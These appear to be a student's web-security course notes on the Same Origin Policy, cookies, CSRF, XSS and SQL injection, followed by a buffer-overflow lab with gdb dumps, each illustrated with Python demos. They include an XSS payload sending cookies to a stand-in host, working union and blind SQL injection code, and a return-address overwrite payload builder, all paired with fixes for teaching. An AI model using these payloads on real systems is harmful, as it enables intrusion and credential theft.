---
tags: 47-SSA
---
Q:
1. How to learn reverse engineering/assembly fast?
2. How to tackle RE CTF challenges?
# 4: Web Security
## Web Security Model
### CRUD operations
CRUD names the four basic operations that can be performed on data in a database or other persistent storage system. Every web endpoint maps to one or more of them, which makes CRUD a handy checklist when enumerating what an attacker could try to do without authorisation.
| CRUD | Action |
|:------ |:-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| Create | This operation refers to the action of adding new data to the system. It typically involves inserting new records or objects into a database or other storage system. |
| Read | This operation refers to the action of retrieving existing data from the system. It typically involves querying a database or other storage system to retrieve records or objects that match certain criteria. |
| Update | This operation refers to the action of modifying existing data in the system. It typically involves updating the values of one or more fields in a database or other storage system. |
| Delete | This operation refers to the action of removing existing data from the system. It typically involves deleting one or more records or objects from a database or other storage system. |
### HTTP request
**stateless protocol**: each request is handled independently of previous or future requests; the server keeps no memory of earlier ones, which is why cookies (below) are needed to add state such as a login session.
- GET
The GET method requests a representation of the specified resource. Requests using GET should only retrieve data and have no side effects (this matters for CSRF: a GET that changes state can be triggered from any other site by an `<img>` or a link).
- HEAD
The HEAD method asks for a response identical to a GET request, but without the response body.
- POST
The POST method submits an entity to the specified resource, often causing a change in state or side effects on the server.
- PUT
The PUT method replaces all current representations of the target resource with the request payload.
### Securing browsers
[World Wide Web Consortium / W3C](https://www.w3.org/)
...
### SOP (Same Origin Policy)
Rule: a script can only read a resource (the DOM of another window or frame, the response to an `XMLHttpRequest`/`fetch` call, storage) if it has the same origin, where the origin is the triple (scheme, host, port): `https://shop.example.com` and `http://shop.example.com` are different origins, and so are `:443` and `:8443`. Cross-origin *loading* (scripts, images, form submissions) is still allowed, which is exactly what CSRF abuses.
- XMLHttpRequest: what is it?
With the XMLHttpRequest object, a web page can send an HTTP request to a server and receive a response back in various formats, such as plain text, XML, HTML, or JSON. The response can be used to update the page content or perform other actions based on the server's response. Under the SOP the script can only read that response if the request went to its own origin (or the server opts in with CORS headers).
### Cookies
**add state**
#### Example
| Field | Value |
| -------- |:-------------------------------------:|
| Name | session-token |
| Content | "s7yZiOvFm4YymG" |
| Domain | .amazon.com |
| Path | / |
| Send For | Any type of connection |
| Expires | Monday, September 08, 2031 7:19:41 PM |
#### Usage
- authentication (session tokens like the one above), tracking, maintaining user state (preferences, shopping cart)
- Only the website that created the cookie can read it? Roughly: the browser only attaches a cookie to requests whose host matches its `Domain` (here `.amazon.com`, i.e. amazon.com and every subdomain) and whose path starts with its `Path`. This scope is looser than the SOP origin: the port is ignored and, unless the cookie is marked `Secure`, so is the scheme. A cookie marked `HttpOnly` is still sent with requests but cannot be read from script, so an XSS payload cannot leak it through `document.cookie`.
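The SOP origin check next to the cookie scoping rules, as an added example (not from the notes). The URLs are constructed; `PAGE_COOKIE` mirrors the session-token table above, and the browser behaviour it encodes is the standard one (origin = scheme/host/port; cookies matched by domain suffix and path prefix, port ignored, scheme only for `Secure`).

```python
from urllib.parse import urlsplit

# Added example (not from the notes). The URLs below are constructed; the cookie
# mirrors the session-token table above.
DEFAULT_PORTS = {"http": 80, "https": 443}

PAGE_COOKIE = {"name": "session-token", "domain": ".amazon.com", "path": "/",
               "secure": False}   # "Send For: Any type of connection" = not Secure


def origin(url):
    """Origin as the Same Origin Policy compares it: (scheme, host, port)."""
    u = urlsplit(url)
    port = u.port if u.port is not None else DEFAULT_PORTS[u.scheme]
    return (u.scheme, u.hostname, port)


def same_origin(url_a, url_b):
    """True if a script loaded from url_a may read a resource at url_b."""
    return origin(url_a) == origin(url_b)


def cookie_sent_to(cookie, url):
    """Would the browser attach `cookie` to a request for `url`?

    Cookie scope is looser than the SOP origin: Domain is a host-suffix match
    (a leading dot means the host and all its subdomains), Path is a prefix
    match, the port is ignored, and the scheme only matters for Secure cookies.
    """
    u = urlsplit(url)
    host = u.hostname or ""
    domain = cookie["domain"].lstrip(".")
    if not (host == domain or host.endswith("." + domain)):
        return False
    path = u.path or "/"
    cpath = cookie["path"]
    if not (path == cpath or path.startswith(cpath.rstrip("/") + "/")):
        return False
    if cookie.get("secure") and u.scheme != "https":
        return False
    return True


if __name__ == "__main__":
    for a, b in [("https://www.amazon.com/cart", "https://www.amazon.com:443/api"),
                 ("https://www.amazon.com/", "http://www.amazon.com/"),
                 ("https://www.amazon.com/", "https://smile.amazon.com/")]:
        print(f"same origin? {same_origin(a, b)!s:5}  {a}  vs  {b}")
    for url in ["https://www.amazon.com/", "http://smile.amazon.com:8080/x",
                "https://amazon.com.evil.example/"]:
        print(f"cookie sent? {cookie_sent_to(PAGE_COOKIE, url)!s:5}  {url}")
```

The mismatch is the point: `http://smile.amazon.com:8080` is a different origin from `https://www.amazon.com`, so its scripts cannot read the main site's pages, yet the browser still sends the `.amazon.com` session cookie to it. Any subdomain that can be made to serve attacker content therefore becomes a cookie-theft or CSRF foothold, which is why session cookies should be host-scoped (no `Domain` attribute) and `Secure`.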
## Cross-site request forgery
Classic example: an attacker's page contains `<img src="https://bank.example/transfer?to=attacker&amount=1000">` (hypothetical bank). The victim's browser fetches the image URL and, by the cookie rules above, attaches the victim's bank session cookie, so the server receives an authenticated state-changing request the user never intended; the "image" fails to render, but the transfer has already happened. Defences: require POST for state changes, a per-session CSRF token embedded in the bank's own forms (the attacker's page cannot read it because of the SOP), `SameSite` cookies, and checking the `Origin`/`Referer` header.
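The image-tag CSRF above and the server-side checks that stop it, as an added example (not from the notes). `bank.example` and `evil.example` are hypothetical hosts; the bank, its sessions and the three request shapes are constructed to show what the server actually sees in each case.

```python
import hmac
import secrets

# Added example (not from the notes). bank.example / evil.example are
# hypothetical hosts; sessions, balances and requests are constructed.
BANK_ORIGIN = "https://bank.example"


class Bank:
    def __init__(self):
        self.balances = {"victim": 1000, "attacker": 0, "shop": 0}
        self.sessions = {}   # session cookie value -> {"user": ..., "csrf": ...}

    def login(self, user):
        cookie = secrets.token_urlsafe(16)
        # The CSRF token lives in the session and is embedded in the bank's own
        # forms; a page on another origin cannot read it (SOP).
        self.sessions[cookie] = {"user": user, "csrf": secrets.token_urlsafe(16)}
        return cookie

    def _transfer(self, src, dst, amount):
        if self.balances[src] < amount:
            return "402 insufficient funds"
        self.balances[src] -= amount
        self.balances[dst] += amount
        return "200 ok"

    def transfer_vulnerable(self, req):
        """Authenticates by the session cookie alone, which the browser attaches
        automatically, and accepts GET: an <img> tag is enough to trigger it."""
        sess = self.sessions.get(req["cookies"].get("session"))
        if sess is None:
            return "401 no session"
        return self._transfer(sess["user"], req["params"]["to"], int(req["params"]["amount"]))

    def transfer_hardened(self, req):
        sess = self.sessions.get(req["cookies"].get("session"))
        if sess is None:
            return "401 no session"
        if req["method"] != "POST":
            return "405 state changes must use POST"
        # Browsers add Origin to cross-site POSTs; an <img> GET carries none.
        # Fail closed: a missing or foreign Origin is rejected.
        if req["headers"].get("Origin") != BANK_ORIGIN:
            return "403 cross-origin request"
        if not hmac.compare_digest(req["params"].get("csrf", ""), sess["csrf"]):
            return "403 missing or wrong CSRF token"
        return self._transfer(sess["user"], req["params"]["to"], int(req["params"]["amount"]))


def image_tag_request(session_cookie):
    """What the victim's browser sends for
    <img src="https://bank.example/transfer?to=attacker&amount=500">
    on the attacker's page: a GET with the victim's cookie and no Origin."""
    return {"method": "GET", "headers": {"Referer": "https://evil.example/"},
            "cookies": {"session": session_cookie},
            "params": {"to": "attacker", "amount": "500"}}


def auto_form_request(session_cookie):
    """A hidden, auto-submitted <form method="POST" action="https://bank.example/transfer">
    on evil.example: same cookie, but the browser adds Origin: https://evil.example."""
    return {"method": "POST", "headers": {"Origin": "https://evil.example"},
            "cookies": {"session": session_cookie},
            "params": {"to": "attacker", "amount": "500"}}


def legitimate_request(bank, session_cookie):
    """The bank's own form: POST from the bank origin carrying the session's token."""
    return {"method": "POST", "headers": {"Origin": BANK_ORIGIN},
            "cookies": {"session": session_cookie},
            "params": {"to": "shop", "amount": "100",
                       "csrf": bank.sessions[session_cookie]["csrf"]}}


if __name__ == "__main__":
    bank = Bank()
    cookie = bank.login("victim")
    print("vulnerable, <img> attack :", bank.transfer_vulnerable(image_tag_request(cookie)))
    print("hardened,   <img> attack :", bank.transfer_hardened(image_tag_request(cookie)))
    print("hardened,   <form> attack:", bank.transfer_hardened(auto_form_request(cookie)))
    print("hardened,   legitimate   :", bank.transfer_hardened(legitimate_request(bank, cookie)))
    print(bank.balances)
```

Two caveats a practitioner would want: the token comparison uses `hmac.compare_digest` so a timing side channel does not leak it, and the hardened handler still relies on the browser sending `Origin` on cross-site POSTs (all current browsers do). Setting the session cookie `SameSite=Lax` (the Chromium default) already withholds it on the `<img>` subresource load, but the server-side token check is what protects against same-site subdomains and older clients, so set `SameSite` explicitly and keep the token.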
## Cross-site scripting
### Reflected XSS (Non-Persistent or Type I)
The payload arrives in the request (URL parameter, form field, header) and is echoed unescaped into the response; the victim has to be lured into sending the crafted request, e.g. by clicking a link.
### Stored XSS (AKA Persistent or Type II)
The payload is saved server-side (comment, profile field, message) and served to every user who views it; no luring needed, and one post can hit every visitor.
### DOM XSS (Type-0)
The server response is clean; client-side script writes attacker-controlled data (e.g. `location.hash`, `document.referrer`) into the DOM through a sink such as `innerHTML`, `document.write` or `eval`. Server-side escaping does not help here because the server never sees the payload.
### Effect of the attack
The injected script runs with the origin and privileges of the vulnerable site: it can read the DOM and any non-`HttpOnly` cookie, send requests as the user (the SOP does not help because the script is same-origin), rewrite the page, log keystrokes, or redirect to a phishing site.
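Reflected and stored XSS side by side with the escaping that stops them, as an added example (not from the notes). The search page, the comment store and the `evil.example` host are constructed; the attribute-context case is included because escaping only `<>&` is a common incomplete fix.

```python
import html

# Added example (not from the notes): a constructed search page and comment
# store showing reflected and stored XSS and the escaping that stops them.
COMMENTS = []   # server-side store: stored XSS persists here


def search_page_vulnerable(query):
    """Reflected XSS: the request parameter is echoed into the response as-is."""
    return f"<p>Results for: {query}</p>"


def search_page_safe(query):
    """Escape for HTML element content: < > & (and quotes) become entities."""
    return f"<p>Results for: {html.escape(query)}</p>"


def post_comment(text):
    """Stored XSS: attacker input is persisted and served to every later visitor."""
    COMMENTS.append(text)


def comments_page_vulnerable():
    return "<ul>" + "".join(f"<li>{c}</li>" for c in COMMENTS) + "</ul>"


def comments_page_safe():
    return "<ul>" + "".join(f"<li>{html.escape(c)}</li>" for c in COMMENTS) + "</ul>"


def prefill_input_vulnerable(value):
    """Escaping only < > & is not enough inside an attribute value: a quote
    closes the attribute and the attacker appends an event handler."""
    return f"<input name='q' value='{html.escape(value, quote=False)}'>"


def prefill_input_safe(value):
    """Context-aware escaping: quote=True also encodes ' and \"."""
    return f"<input name='q' value='{html.escape(value, quote=True)}'>"


# DOM XSS happens entirely in the browser, e.g.
#   out.innerHTML = decodeURIComponent(location.hash.slice(1))   // sink
# and is fixed by assigning to textContent (or running a sanitiser) instead.

if __name__ == "__main__":
    payload = "<script>new Image().src='https://evil.example/?c='+document.cookie</script>"
    print(search_page_vulnerable(payload))
    print(search_page_safe(payload))
    post_comment(payload)
    print(comments_page_vulnerable())
    print(comments_page_safe())
    attr = "' onfocus='alert(1)' autofocus='"
    print(prefill_input_vulnerable(attr))
    print(prefill_input_safe(attr))
```

The escaping function has to match the context the value lands in (element body, attribute, URL, JavaScript string); `html.escape` covers the first two, and anything inside a `<script>` block or a `javascript:` URL needs a different encoder or, better, no untrusted data at all.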
## SQL injection
Root cause: user input is concatenated into the query text, so quotes and keywords in the input are parsed as SQL. Fix: parameterised (prepared) queries, where the value is bound by the driver and never parsed.
### In-band SQLi (Classic SQLi)
Attack and data retrieval use the same channel: the result of the injected query comes back in the normal response.
#### Error-based SQLi
Provoke database error messages that leak the result (table names, column values) in the error text shown to the user.
#### Union-based SQLi
Append `UNION SELECT ...` with the same column count as the original query so rows from other tables are returned alongside the legitimate result.
### Inferential SQLi (Blind SQLi)
No data comes back directly; the attacker infers it one bit or character at a time from how the application behaves.
#### Boolean-based (content-based)
Inject a condition (e.g. `' AND substr(password,1,1)='s' --`) and observe whether the page shows its "true" or "false" content.
#### Time-based Blind SQLi
Inject a conditional delay (e.g. `IF(cond, SLEEP(5), 0)` in MySQL) and use the response time as the oracle; works when the page content does not change at all.
### Out-of-band SQLi
The result is exfiltrated over a different channel the database server can open, such as a DNS lookup or HTTP request to an attacker-controlled host.
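Union-based and boolean-based blind injection run against a real query engine, plus the parameterised fix, as an added example (not from the notes). The in-memory SQLite database, its `users` table and the two lookup functions are constructed; the oracle in the blind attack is "did the query return any row", which is what a login or search page leaks through its content.

```python
import sqlite3
import string

# Added example (not from the notes): a constructed in-memory SQLite database
# with a toy users table; the vulnerable and safe lookups are hypothetical.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "alice", "s3cret", "admin"),
        (2, "bob", "hunter2", "user"),
    ])
    return conn


def lookup_vulnerable(conn, username):
    """The bug: user input is concatenated into the SQL text, so a quote in
    `username` ends the string literal and the rest is parsed as SQL."""
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    """Parameterised query: the value is bound by the driver, never parsed as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def union_attack(conn):
    """In-band, union-based: the injected SELECT must return the same number of
    columns (2) as the original; its rows come back in the normal result."""
    payload = "x' UNION SELECT username, password FROM users --"
    return lookup_vulnerable(conn, payload)


def boolean_blind_attack(conn, target="alice", max_len=32):
    """Inferential, boolean-based: nothing from the injected query is shown,
    but 'any row returned?' is a yes/no oracle, so the password is recovered
    one character at a time. A time-based attack uses the same loop with
    response time (e.g. MySQL SLEEP()) as the oracle instead."""
    charset = string.ascii_lowercase + string.digits   # enough for the sample data
    recovered = ""
    for pos in range(1, max_len + 1):
        for c in charset:
            probe = f"{target}' AND substr(password,{pos},1)='{c}' --"
            if lookup_vulnerable(conn, probe):   # oracle: row present = condition true
                recovered += c
                break
        else:
            break   # no character matched: end of the secret
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("union :", union_attack(db))
    print("blind :", boolean_blind_attack(db))
    print("safe  :", lookup_safe(db, "x' UNION SELECT username, password FROM users --"))
```

The same payloads passed to `lookup_safe` return nothing because the whole string, quotes and all, is compared against the `username` column. That is the property to test for when reviewing a fix: not that the payload is "filtered", but that it can no longer change the query's structure.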
# Lab 4: Buffer Overflow II
Q: ask coursework ex1 written permission
## Ex1
```
gcc vuln.c -o vuln -ggdb -fno-stack-protector -z execstack -m64 -mpreferred-stack-boundary=4
```
### **216**
> $ ./vuln $(python -c 'print("A"*215)')
You entered: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> $ ./vuln $(python -c 'print("A"*216)')
You entered: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
Same runs under gdb (ASLR is disabled by default under gdb, so the addresses below are stable across runs):
> (gdb) run $(python -c 'print("A"*216)')
> (gdb) run $(python -c 'print("A"*200)')
> $ ./vuln $(python -c 'print("A"*217)')
You entered: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Illegal instruction (core dumped)
Stack after the 200-byte run:
> (gdb) x /60wx $sp
```
0x7fffffffddb0: 0xffffdf78 0x00007fff 0x00000000 0x00000002
0x7fffffffddc0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffddd0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffdde0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffddf0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde00: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde10: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde20: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde30: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde40: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde50: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde60: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde70: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde80: 0x41414141 0x41414141 0x00000000 0x00000000
0x7fffffffde90: 0x555547a0 0x00005555 0xf7a03bf7 0x00007fff
```
> (gdb) stepi
> (gdb) info reg rbp rip
```
rbp 0x5555555547a0 0x5555555547a0 <__libc_csu_init>
rip 0x555555554799 0x555555554799 <main+127>
```
> (gdb) stepi
> (gdb) info reg rbp rip
```
rbp 0x4141414141414141 0x4141414141414141
rip 0x7ffff7a03b00 0x7ffff7a03b00 <_dl_start>
```
Reading the dumps together: the buffer starts at 0x7fffffffddc0 and the 200 A's end at 0x7fffffffde88. The saved rbp (0x00005555555547a0) sits at 0x7fffffffde90, 208 bytes into the buffer, and the saved return address (0x00007ffff7a03bf7, back into libc) at 0x7fffffffde98, 216 bytes in. The first register dump (rbp restored to 0x5555555547a0, rip still inside main) is consistent with the 200-byte run; the second is the 216-byte run: rbp was popped as 0x4141414141414141 and the copied string's terminating NUL cleared the low byte of the return address, so `ret` jumped to 0x7ffff7a03b00 and the process segfaulted. With 217 bytes the low two bytes become 0x41 0x00 instead, hence the illegal instruction. So the return address is 216 bytes from the start of the buffer: 216 bytes of padding, then the address to jump to. Note that an argv string cannot contain NUL bytes, so only the six non-zero low bytes of a 64-bit user-space address can be sent; the seventh zero comes from the copy's terminator and the eighth is already zero on the stack, which is why the address has to be the last thing in the payload.
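The general form of the A*N probing above, as an added example (not from the lab notes): send a pattern in which every 4-byte window is unique (a De Bruijn sequence, the technique behind pwntools' `cyclic`), read the value that landed in rbp or rip at the crash, and look its position up instead of bisecting by hand. The demo simulates the crash with the offsets read off the gdb dump above (saved rbp at 208, return address at 216); the jump target in the payload is a placeholder, not an address from the page.

```python
# Added example (not from the lab notes): cyclic-pattern offset finding, the
# general version of the A*N runs above. Offsets 208/216 are the ones read off
# the gdb dump; the 0x42... jump target is a placeholder.
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"
N = 4            # window size: 4 unique bytes are enough to identify a position
_SEQ = None      # cached pattern (26**4 bytes), generated once


def de_bruijn(alphabet=ALPHABET, n=N):
    """Standard De Bruijn sequence B(k, n): every length-n window is unique."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in out)


def _pattern():
    global _SEQ
    if _SEQ is None:
        _SEQ = de_bruijn()
    return _SEQ


def cyclic(length):
    """First `length` bytes of the pattern: what to send instead of 'A' * length."""
    seq = _pattern()
    if length > len(seq):
        raise ValueError("pattern exhausted; enlarge the alphabet or N")
    return seq[:length]


def find_offset(value):
    """Offset in the pattern of `value`, given either the bytes seen in memory
    or the integer a register holds (little-endian, like rbp = 0x4141...)."""
    if isinstance(value, int):
        value = value.to_bytes(8, "little")
    off = _pattern().find(value[:N])
    if off < 0:
        raise ValueError("value does not come from the pattern")
    return off


def build_payload(ret_offset, new_ret, filler=b"A"):
    """Padding up to the saved return address, then the 8-byte little-endian
    address to jump to. When delivered via argv the trailing zero bytes cannot
    be sent; the string terminator and the zero already on the stack supply them."""
    return filler * ret_offset + struct.pack("<Q", new_ret)


if __name__ == "__main__":
    pat = cyclic(300)
    # Simulated crash with the layout from the dump: saved rbp gets pattern
    # bytes 208..216 and the return address bytes 216..224.
    crashed_rbp = int.from_bytes(pat[208:216], "little")
    rbp_off = find_offset(crashed_rbp)
    print(f"rbp overwritten at offset {rbp_off}; return address at {rbp_off + 8}")
    print(build_payload(rbp_off + 8, 0x4242424242424242)[-16:])
```

On x86-64 the saved return address usually cannot be read from `rip` after the crash (the CPU refuses to jump to a non-canonical pattern value), so the usual move is exactly the one above: take the offset from `rbp`, which is fully overwritten and still readable, and add 8.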